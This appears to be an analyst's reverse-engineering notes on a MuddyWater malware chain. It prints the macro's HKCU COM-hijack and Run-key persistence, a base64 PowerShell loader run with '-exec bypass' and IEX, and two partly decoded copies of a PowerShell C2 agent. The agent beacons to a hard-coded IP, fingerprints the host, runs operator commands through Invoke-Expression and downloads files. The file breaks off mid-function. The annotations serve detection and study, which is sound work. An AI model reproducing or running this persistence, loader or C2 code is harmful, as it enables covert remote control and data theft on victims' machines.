Malware-Misc-RE/2019-04-09-MuddyWater-Chain-Notes-vk.ps1
| // Hash: b9a67ffb81420e68f9e5607cc200604a  (32 hex chars = MD5 length; the original label said "SHA-256", but a SHA-256 is 64 hex chars — verify which digest this is before using it as an IOC) | |
| // ht @HONKONE_K & @shotgunner101 | |
| // REMOTE TEMPLATE :http://tfu[.]ae/readme.txt | |
| // C2: hxxp://185[.]162[.]235[.]182 | |
| /////////////////////////////////////////////////////////////////////////////////// | |
| //////////////////////// WRITE TO REGISTRY //////////////////////////////////////// | |
| /////////////////////////////////////////////////////////////////////////////////// | |
| ' Persistence + payload drop (macro stage). All registry writes are HKCU, so no elevation is needed. | |
| ' 1) A bogus COM class under HKCU\Software\Classes\CLSID\{8dac4e38-...} whose Shell\Manage\command | |
| '    value holds the launcher string VfNxRmsa (not defined in this excerpt; the "COMMAND-LINE | |
| '    ARGUMENT FROM REGISTRY" section below appears to be its contents). | |
| ' 2) A Run-key value "UpdateService" that starts explorer.exe with shell:::{CLSID} at logon; | |
| '    presumably Explorer resolves the CLSID and runs the Manage verb command from step 1. | |
| ' Detection: the CLSID {8dac4e38-b146-4617-96a3-a3f839e5c568} under HKCU\Software\Classes, the | |
| ' Run value name "UpdateService", and "explorer.exe shell:::{" on a command line. | |
| Dim VBDxTHIz As Object | |
| Set VBDxTHIz = CreateObject("WScript.Shell") | |
| VBDxTHIz.RegWrite "HKEY_CURRENT_USER\Software\Classes\CLSID\{8dac4e38-b146-4617-96a3-a3f839e5c568}\", "" | |
| VBDxTHIz.RegWrite "HKEY_CURRENT_USER\Software\Classes\CLSID\{8dac4e38-b146-4617-96a3-a3f839e5c568}\Shell\", "" | |
| VBDxTHIz.RegWrite "HKEY_CURRENT_USER\Software\Classes\CLSID\{8dac4e38-b146-4617-96a3-a3f839e5c568}\Shell\Manage\", "" | |
| VBDxTHIz.RegWrite "HKEY_CURRENT_USER\Software\Classes\CLSID\{8dac4e38-b146-4617-96a3-a3f839e5c568}\Shell\Manage\command\",\ | |
| VfNxRmsa, "REG_SZ" | |
| VBDxTHIz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\UpdateService", \ | |
| "c:\windows\explorer.exe shell:::{8dac4e38-b146-4617-96a3-a3f839e5c568}", "REG_SZ" | |
| ' Stage-2 payload: kzWYdqvaZi (the encoded PowerShell, not shown in this excerpt) is written to | |
| ' "picture.jpg". The extension is cosmetic; the loader command below reads it back with get-content. | |
| Open "c:\windows\temp\picture.jpg" For Output As #1 | |
| Print #1, kzWYdqvaZi | |
| Close #1 | |
| ' One-line VBScript stub saved as "icon.ico": runs its first argument with a hidden window (0) | |
| ' and without waiting (False). Extension is irrelevant since it is launched via wscript.exe /E:vbs. | |
| Open "c:\windows\temp\icon.ico" For Output As #1 | |
| Print #1, "CreateObject(""Wscript.Shell"").Run WScript.Arguments(0), 0, False" | |
| Close #1 | |
| /* | |
| /////////////////////////////////////////////////////////////////////////////////// | |
| //////////////////////// COMMAND-LINE ARGUMENT FROM REGISTRY ////////////////////// | |
| /////////////////////////////////////////////////////////////////////////////////// | |
| c:\windows\system32\wscript.exe /E:vbs \ | |
| c:\windows\temp\icon.ico \ | |
| "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]:: \ | |
| FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""" | |
| // Decoding the Base64 blob above gives the stage-1 loader: it get-content's c:\windows\temp\picture.jpg, | |
| // Base64-decodes it, then (after start-sleep 10) walks the result in 3-char groups computing | |
| // v = v*52 + (ord(ch) - 40), emits the base-256 digits of v, reverses the collected array, joins it | |
| // and IEXes it — a custom base-52 unwrapping of the script shown below. The [char]0x53 / [char]0x6f | |
| // splices only hide the substrings "System", "ASCII" and "FromBase64String" from keyword scanning. | |
| // Note the launch chain: wscript.exe /E:vbs <file named .ico> -> powershell -exec bypass (AMSI/CLM untouched, | |
| // but "-exec bypass" plus a non-.vbs script path is a cheap detection hook). | |
| */ | |
| /////////////////////////////////////////////////////////////////////////////////// | |
| //////////////////////// PARTIALLY DECODED POWERSHELL SCRIPT "picture.jpg" ///////// | |
| // Four memory-dump copies of the same script follow, each one decoding stage further along. | |
| // Sigil legend (established by comparing the copies): kXB = $ , Wqo = " , Jx1 = | , 6az = \ . | |
| // V7X is never resolved in any copy and is presumably ' (single quote). Identifiers are ROT13 | |
| // (Zbq=Mod, Riny=Eval, vasbvavg=infoinit, pbzznaq_naq_pbageby=command_and_control, ...). | |
| /////////////////////////////////////////////////////////////////////////////////// | |
| # Stage-2 C2 agent globals (first dump copy: kXB = $, Wqo = ", V7X presumably '). | |
| # $global:url and $global:id are empty here; $global:id is set later by vasbvavg ("infoinit"). | |
| kXBglobal:url = WqoWqo | |
| kXBglobal:id = WqoWqo | |
| # ROT13 cevingr = "private", choyvp = "public": (exponent, modulus) pairs consumed by the | |
| # per-character modular-exponentiation routines raPelcg/qrPelcg below. Moduli of 713 and 437 are | |
| # toy-sized, so anything framed with them is trivially reversible offline. | |
| kXBcevingr = 959, 713 | |
| kXBchoyvp = 37, 437 | |
| # C2 host list (undefanged here; header records it as hxxp://185[.]162[.]235[.]182). | |
| kXBC = @(V7Xhttp://185.162.235.182V7X) | |
| # Zbq (ROT13 "Mod"): square-and-multiply modular exponentiation; returns x^H mod n. | |
| function Zbq(kXBx, kXBH, kXBn){ | |
| kXBXi = kXBx | |
| kXBEi = kXBH | |
| kXBYi = 1 | |
| while(kXBEi -gt 0){ | |
| if((kXBEi % 2) -eq 0) { | |
| # even exponent: square the base, halve the exponent | |
| kXBXi = (kXBXi * kXBXi) % kXBn | |
| kXBEi = kXBEi / 2 | |
| } else { | |
| # odd exponent: fold the base into the accumulator, decrement | |
| kXBYi = (kXBXi * kXBYi) % kXBn | |
| kXBEi = kXBEi - 1 | |
| } | |
| } | |
| return kXBYi | |
| } | |
| # raPelcg (ROT13 "enCrypt"): per-character textbook RSA. pk = (exponent, modulus); every char of | |
| # the plaintext becomes ord(c)^e mod n, returned as an int array. There is no padding or | |
| # randomisation, so equal chars always map to equal values — effectively a substitution cipher | |
| # that an analyst can reverse by tabulating the mapping for every code point. | |
| function raPelcg(kXBpk, kXBcynvagrkg){ | |
| try{ | |
| kXBxrl, kXBn = kXBpk; | |
| kXBzlneenl = @(); | |
| for(kXBi=0; kXBi -lt kXBcynvagrkg.Length; kXBi++){ | |
| kXBahz = [int][char]kXBcynvagrkg[kXBi] | |
| kXBt = Zbq kXBahz kXBxrl kXBn | |
| kXBzlneenl += kXBt | |
| } | |
| return kXBzlneenl | |
| } | |
| catch{ | |
| # trgEnaqbzCebkl (ROT13 "getRandomProxy") is called on errors but not defined in any copy seen here. | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| # qrPelcg (ROT13 "deCrypt"): inverse of raPelcg — each int of the ciphertext array is raised to | |
| # the exponent in pk mod n and converted back to a char; the chars are joined into one string. | |
| function qrPelcg(kXBpk, kXBpvcuregrkg){ | |
| try{ | |
| kXBxrl, kXBn = kXBpk; | |
| kXBzl_neenl = @(); | |
| for (kXBi = 0 ; kXBi -lt kXBpvcuregrkg.Length; kXBi++){ | |
| kXBahz = [int]kXBpvcuregrkg[kXBi] | |
| kXBt = Zbq kXBahz kXBxrl kXBn | |
| kXBzl_neenl += [convert]::ToChar([int]kXBt) | |
| } | |
| return -join kXBzl_neenl | |
| } | |
| catch{ | |
| # undefined helper (see raPelcg) — any failure ends up as a missing-command error | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| # uggcCBFG (ROT13 "httpPOST"): POST rap_zft ("enc_msg") as application/json to $global:url + hey, | |
| # via the system proxy with the logged-on user's default credentials, and return the response body. | |
| # On any exception it returns the literal "error", prints the URL + message to the console, and sleeps | |
| # a random 20-40 s (retry jitter). Request/response streams are never closed. | |
| # Detection: powershell.exe POSTing application/json to the C2 host through the corporate proxy. | |
| function uggcCBFG(kXBhey,kXBrap_zft){ | |
| trgEnaqbzCebkl | |
| try{ | |
| kXBpbagrag = kXBrap_zft | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBglobal:url + kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBrapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes(kXBpbagrag); | |
| kXBjroerd.Method = WqoPOSTWqo; | |
| kXBjroerd.ContentLength = kXBrapbqr_qngn.length; | |
| kXBjroerd.ContentType = Wqoapplication/jsonWqo | |
| if (kXBrapbqr_qngn.Length -gt 0){ | |
| kXBerd_fgernz = kXBjroerd.GetRequestStream(); | |
| kXBerd_fgernz.Write(kXBrapbqr_qngn, 0, kXBrapbqr_qngn.Length); | |
| } | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| kXBerfhyg = WqoerrorWqo | |
| write-host kXBhey Wqo`tWqo (kXBglobal:url + kXB_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return kXBerfhyg | |
| } | |
| # uggcTRG (ROT13 "httpGET"): GET $global:url + hey through the system proxy with default | |
| # credentials; returns the body, or "error" after a 20-40 s random sleep on failure. | |
| function uggcTRG(kXBhey){ | |
| trgEnaqbzCebkl | |
| try | |
| { | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBglobal:url + kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBjroerd.Method = WqoGETWqo; | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| kXBerfhyg = WqoerrorWqo | |
| write-host kXBhey Wqo`tWqo (kXBglobal:url + kXB_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return kXBerfhyg | |
| } | |
| # fuggcTRG (ROT13 "shttpGET"): GET an absolute URL (no $global:url prefix) via the system proxy. | |
| # Unlike uggcTRG it neither sleeps nor calls the proxy helper on failure — it just returns "". | |
| # Used by trgCVC for the public-IP lookup against https://v4.ident.me/. | |
| function fuggcTRG(kXBhey){ | |
| try | |
| { | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBjroerd.Method = WqoGETWqo; | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } | |
| catch { | |
| kXBerfhyg = WqoWqo | |
| } | |
| return kXBerfhyg | |
| } | |
| # Riny (ROT13 "Eval"): the remote-code-execution primitive. Runs an operator-supplied string | |
| # through Invoke-Expression and returns its output rendered with Out-String. Commands starting | |
| # with "cd" are special-cased to report $PWD instead of the (empty) command output. | |
| function Riny(kXBpzq){ | |
| try{ | |
| kXBbhg = IEX kXBpzq -ErrorAction SilentlyContinue | |
| if(kXBpzq.StartsWith(WqocdWqo)){kXBbhg = kXBPWD;} | |
| kXBbhg = (kXBbhg Jx1 Out-String) | |
| } catch { | |
| # exception text is returned to the operator rather than swallowed | |
| kXBbhg = kXB_.Exception.Message | |
| } | |
| return kXBbhg | |
| } | |
| # vasbvavg (ROT13 "infoinit"): host fingerprinting. Builds a "**"-joined string of | |
| # OS ** IPv4 ** arch ** hostname ** domain ** [+]username ** publicIP, stores its MD5 in | |
| # $global:id (the bot identifier) and returns "<id>**<fingerprint>". | |
| # Network IOC: HTTPS GET to v4.ident.me. Host IOCs: ipconfig and "net config workstation" spawned by powershell.exe. | |
| function vasbvavg(){ | |
| # trgVC ("getIP"): first IPv4 address printed by ipconfig, via $Matches[1] of the -match regex. | |
| function trgVC(){ | |
| try{ | |
| return (kXB(ipconfig Jx1 where {kXB_ -match V7XIPv4.+6azs(6azd{1,3}6az.6azd{1,3}6az.6azd{1,3}6az.6azd{1,3})V7X } Jx1 out-null; kXBZngpurf[1])); | |
| } catch { | |
| return WqoErrorIPWqo; | |
| } | |
| } | |
| # trgBF ("getOS"): ProductName from HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion. | |
| function trgBF(){ | |
| try{ | |
| return ((get-itemproperty -Path WqoHKLM:6azSOFTWARE6azMicrosoft6azWindows NT6azCurrentVersionWqo -Name ProductName).ProductName) | |
| } catch { | |
| return WqoErrorOSWqo; | |
| } | |
| } | |
| # trgNepu ("getArch"): pointer size of the PowerShell process, i.e. process bitness, not necessarily OS bitness. | |
| function trgNepu(){ | |
| try{ | |
| if([System.IntPtr]::Size -eq 4){ | |
| return Wqo32-bitWqo | |
| } | |
| else{ | |
| return Wqo64-bitWqo | |
| } | |
| } catch { | |
| return WqoErrorArchWqo; | |
| } | |
| } | |
| # trgQbznva ("getDomain"): last token of the "Workstation domain" line of `net config workstation`. | |
| function trgQbznva(){ | |
| try{ | |
| return ((net config workstation) -match V7XWorkstation domain6azs+6azS+kXBV7X -replace V7X.+?(6azS+)kXBV7X,V7XkXB1V7X); | |
| } catch { | |
| return WqoErrorDomainWqo; | |
| } | |
| } | |
| # trgUbfgAnzr ("getHostName"): DNS-resolved FQDN of the local host (GetHostByName("")). | |
| function trgUbfgAnzr(){ | |
| try{ | |
| return ([System.Net.DNS]::GetHostByName(V7XV7X).HostName); | |
| } catch { | |
| return WqoErrorHostNameWqo; | |
| } | |
| } | |
| # trgHfreanzr ("getUsername"): intended to return $env:UserName if it is purely alphanumeric, | |
| # else the 8.3 short name of the profile folder. Two defects make the first branch dead: | |
| # .replace() here is String.Replace (literal, not regex), and the comparison reads the | |
| # undefined $ghfr (typo for $ghfre), so the ShortName path is always taken. | |
| function trgHfreanzr(){ | |
| try{ | |
| try{ | |
| kXBsfb = New-Object -ComObject Scripting.FileSystemObject; | |
| kXBhfre = kXBenv:UserName | |
| kXBghfre = kXBhfre.replace(V7X[^a-zA-Z0-9]V7X,V7XV7X) | |
| if(kXBghfr -eq kXBhfre){ | |
| return kXBhfre | |
| } | |
| return (kXBsfb.getfolder(V7Xc:6az6azusers6az6azV7X + kXBenv:UserName).ShortName) | |
| } catch { | |
| return kXBenv:UserName | |
| } | |
| } catch { | |
| return Wqo-Wqo | |
| } | |
| } | |
| # vfNqzva ("isAdmin"): "+" when the current token holds the built-in Administrator role, else "". | |
| # The "+" is prepended to the username in the fingerprint (see below). | |
| function vfNqzva(){ | |
| try{ | |
| kXBJvaqbjfVqragvgl = [system.security.principal.windowsidentity]::GetCurrent() | |
| kXBCevapvcny = New-Object System.Security.Principal.WindowsPrincipal(kXBJvaqbjfVqragvgl) | |
| kXBNqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator | |
| if (kXBCevapvcny.IsInRole(kXBNqzvaEbyr)) | |
| { | |
| return V7X+V7X | |
| } | |
| else | |
| { | |
| return V7XV7X | |
| } | |
| } catch { | |
| return WqoWqo | |
| } | |
| } | |
| # trgCVC ("getPIP"): public IP from https://v4.ident.me/ (empty string on failure, per fuggcTRG). | |
| function trgCVC(){ | |
| try{ | |
| kXBernyVC = fuggcTRG Wqohttps://v4.ident.me/Wqo | |
| return kXBernyVC | |
| } catch { | |
| return WqoErrorPublicIPWqo | |
| } | |
| } | |
| # Assemble the fingerprint; note admin flag and username are concatenated without a separator. | |
| kXBFlfVasb = trgBF | |
| kXBFlfVasb += Wqo**Wqo | |
| kXBFlfVasb += trgVC | |
| kXBFlfVasb += Wqo**Wqo | |
| kXBFlfVasb += trgNepu | |
| kXBFlfVasb += Wqo**Wqo | |
| kXBFlfVasb += trgUbfgAnzr | |
| kXBFlfVasb += Wqo**Wqo | |
| kXBFlfVasb += trgQbznva | |
| kXBFlfVasb += Wqo**Wqo | |
| kXBFlfVasb += vfNqzva | |
| kXBFlfVasb += trgHfreanzr | |
| kXBFlfVasb += Wqo**Wqo | |
| kXBFlfVasb += trgCVC | |
| # bot id = MD5(fingerprint); stable across runs as long as the public IP does not change | |
| kXBglobal:id = zq5trarengbe(kXBFlfVasb) | |
| return (kXBglobal:id + V7X**V7X + kXBFlfVasb) | |
| } | |
| # zq5trarengbe (ROT13 "md5generator"): upper-case hex MD5 of the UTF-8 bytes of the input, | |
| # with BitConverter's dashes stripped. Used only to derive the bot id — not a security boundary. | |
| function zq5trarengbe(kXBfgeVa){ | |
| kXBzq5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider | |
| kXBhgs8 = new-object -TypeName System.Text.UTF8Encoding | |
| kXBunfu = [System.BitConverter]::ToString(kXBzq5.ComputeHash(kXBhgs8.GetBytes(kXBfgeVa))) | |
| kXBbhgchg = kXBunfu.replace(V7X-V7X,V7XV7X) | |
| return kXBbhgchg | |
| } | |
| function pbzznaq_naq_pbageby(kXBpzq){ | |
| try{ | |
| if(kXBpzq.StartsWith(V7XuploadV7X)){ | |
| try{ | |
| kXBpzq=kXBpzq.replace(V7Xupload V7X,V7XV7X) | |
| kXBwc = New-Object System.Net.WebClient | |
| kXBwc.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBwc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBwc.DownloadFile(kXBpzq, (Wqoc:6azprogramdata6azWqo + kXBpzq.Substring(kXBpzq.LastIndexOf(V7X/V7X),kXBpzq.Length-kXBpzq.LastIndexOf(V7X/V7X)))) | |
| return Riny WqopwdWqo | |
| }catch{ | |
| 0x2c94270 (23910):   // second memory-dump copy of the same script; at this stage Wqo is already decoded to " (kXB, V7X, Jx1, 6az still encoded). pbzznaq_naq_pbageby above is cut off at this boundary. | |
| kXBglobal:url = "" | |
| kXBglobal:id = "" | |
| kXBcevingr = 959, 713 | |
| kXBchoyvp = 37, 437 | |
| kXBC = @(V7Xhttp://185.162.235.182V7X) | |
| function Zbq(kXBx, kXBH, kXBn){ | |
| kXBXi = kXBx | |
| kXBEi = kXBH | |
| kXBYi = 1 | |
| while(kXBEi -gt 0){ | |
| if((kXBEi % 2) -eq 0) { | |
| kXBXi = (kXBXi * kXBXi) % kXBn | |
| kXBEi = kXBEi / 2 | |
| } else { | |
| kXBYi = (kXBXi * kXBYi) % kXBn | |
| kXBEi = kXBEi - 1 | |
| } | |
| } | |
| return kXBYi | |
| } | |
| function raPelcg(kXBpk, kXBcynvagrkg){ | |
| try{ | |
| kXBxrl, kXBn = kXBpk; | |
| kXBzlneenl = @(); | |
| for(kXBi=0; kXBi -lt kXBcynvagrkg.Length; kXBi++){ | |
| kXBahz = [int][char]kXBcynvagrkg[kXBi] | |
| kXBt = Zbq kXBahz kXBxrl kXBn | |
| kXBzlneenl += kXBt | |
| } | |
| return kXBzlneenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| function qrPelcg(kXBpk, kXBpvcuregrkg){ | |
| try{ | |
| kXBxrl, kXBn = kXBpk; | |
| kXBzl_neenl = @(); | |
| for (kXBi = 0 ; kXBi -lt kXBpvcuregrkg.Length; kXBi++){ | |
| kXBahz = [int]kXBpvcuregrkg[kXBi] | |
| kXBt = Zbq kXBahz kXBxrl kXBn | |
| kXBzl_neenl += [convert]::ToChar([int]kXBt) | |
| } | |
| return -join kXBzl_neenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| function uggcCBFG(kXBhey,kXBrap_zft){ | |
| trgEnaqbzCebkl | |
| try{ | |
| kXBpbagrag = kXBrap_zft | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBglobal:url + kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBrapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes(kXBpbagrag); | |
| kXBjroerd.Method = "POST"; | |
| kXBjroerd.ContentLength = kXBrapbqr_qngn.length; | |
| kXBjroerd.ContentType = "application/json" | |
| if (kXBrapbqr_qngn.Length -gt 0){ | |
| kXBerd_fgernz = kXBjroerd.GetRequestStream(); | |
| kXBerd_fgernz.Write(kXBrapbqr_qngn, 0, kXBrapbqr_qngn.Length); | |
| } | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| kXBerfhyg = "error" | |
| write-host kXBhey "`t" (kXBglobal:url + kXB_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return kXBerfhyg | |
| } | |
| function uggcTRG(kXBhey){ | |
| trgEnaqbzCebkl | |
| try | |
| { | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBglobal:url + kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBjroerd.Method = "GET"; | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| kXBerfhyg = "error" | |
| write-host kXBhey "`t" (kXBglobal:url + kXB_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return kXBerfhyg | |
| } | |
| function fuggcTRG(kXBhey){ | |
| try | |
| { | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBjroerd.Method = "GET"; | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } | |
| catch { | |
| kXBerfhyg = "" | |
| } | |
| return kXBerfhyg | |
| } | |
| function Riny(kXBpzq){ | |
| try{ | |
| kXBbhg = IEX kXBpzq -ErrorAction SilentlyContinue | |
| if(kXBpzq.StartsWith("cd")){kXBbhg = kXBPWD;} | |
| kXBbhg = (kXBbhg Jx1 Out-String) | |
| } catch { | |
| kXBbhg = kXB_.Exception.Message | |
| } | |
| return kXBbhg | |
| } | |
| function vasbvavg(){ | |
| function trgVC(){ | |
| try{ | |
| return (kXB(ipconfig Jx1 where {kXB_ -match V7XIPv4.+6azs(6azd{1,3}6az.6azd{1,3}6az.6azd{1,3}6az.6azd{1,3})V7X } Jx1 out-null; kXBZngpurf[1])); | |
| } catch { | |
| return "ErrorIP"; | |
| } | |
| } | |
| function trgBF(){ | |
| try{ | |
| return ((get-itemproperty -Path "HKLM:6azSOFTWARE6azMicrosoft6azWindows NT6azCurrentVersion" -Name ProductName).ProductName) | |
| } catch { | |
| return "ErrorOS"; | |
| } | |
| } | |
| function trgNepu(){ | |
| try{ | |
| if([System.IntPtr]::Size -eq 4){ | |
| return "32-bit" | |
| } | |
| else{ | |
| return "64-bit" | |
| } | |
| } catch { | |
| return "ErrorArch"; | |
| } | |
| } | |
| function trgQbznva(){ | |
| try{ | |
| return ((net config workstation) -match V7XWorkstation domain6azs+6azS+kXBV7X -replace V7X.+?(6azS+)kXBV7X,V7XkXB1V7X); | |
| } catch { | |
| return "ErrorDomain"; | |
| } | |
| } | |
| function trgUbfgAnzr(){ | |
| try{ | |
| return ([System.Net.DNS]::GetHostByName(V7XV7X).HostName); | |
| } catch { | |
| return "ErrorHostName"; | |
| } | |
| } | |
| function trgHfreanzr(){ | |
| try{ | |
| try{ | |
| kXBsfb = New-Object -ComObject Scripting.FileSystemObject; | |
| kXBhfre = kXBenv:UserName | |
| kXBghfre = kXBhfre.replace(V7X[^a-zA-Z0-9]V7X,V7XV7X) | |
| if(kXBghfr -eq kXBhfre){ | |
| return kXBhfre | |
| } | |
| return (kXBsfb.getfolder(V7Xc:6az6azusers6az6azV7X + kXBenv:UserName).ShortName) | |
| } catch { | |
| return kXBenv:UserName | |
| } | |
| } catch { | |
| return "-" | |
| } | |
| } | |
| function vfNqzva(){ | |
| try{ | |
| kXBJvaqbjfVqragvgl = [system.security.principal.windowsidentity]::GetCurrent() | |
| kXBCevapvcny = New-Object System.Security.Principal.WindowsPrincipal(kXBJvaqbjfVqragvgl) | |
| kXBNqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator | |
| if (kXBCevapvcny.IsInRole(kXBNqzvaEbyr)) | |
| { | |
| return V7X+V7X | |
| } | |
| else | |
| { | |
| return V7XV7X | |
| } | |
| } catch { | |
| return "" | |
| } | |
| } | |
| function trgCVC(){ | |
| try{ | |
| kXBernyVC = fuggcTRG "https://v4.ident.me/" | |
| return kXBernyVC | |
| } catch { | |
| return "ErrorPublicIP" | |
| } | |
| } | |
| kXBFlfVasb = trgBF | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgVC | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgNepu | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgUbfgAnzr | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgQbznva | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += vfNqzva | |
| kXBFlfVasb += trgHfreanzr | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgCVC | |
| kXBglobal:id = zq5trarengbe(kXBFlfVasb) | |
| return (kXBglobal:id + V7X**V7X + kXBFlfVasb) | |
| } | |
| function zq5trarengbe(kXBfgeVa){ | |
| kXBzq5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider | |
| kXBhgs8 = new-object -TypeName System.Text.UTF8Encoding | |
| kXBunfu = [System.BitConverter]::ToString(kXBzq5.ComputeHash(kXBhgs8.GetBytes(kXBfgeVa))) | |
| kXBbhgchg = kXBunfu.replace(V7X-V7X,V7XV7X) | |
| return kXBbhgchg | |
| } | |
| function pbzznaq_naq_pbageby(kXBpzq){ | |
| try{ | |
| if(kXBpzq.StartsWith(V7XuploadV7X)){ | |
| try{ | |
| kXBpzq=kXBpzq.replace(V7Xupload V7X,V7XV7X) | |
| kXBwc = New-Object System.Net.WebClient | |
| kXBwc.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBwc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBwc.DownloadFile(kXBpzq, ("c:6azprogramdata6az" + kXBpzq.Substring(kXBpzq.LastIndexOf(V7X/V7X),kXBpzq.Length-kXBpzq.LastIndexOf(V7X/V7X)))) | |
| return Riny "pwd" | |
| }catch{ | |
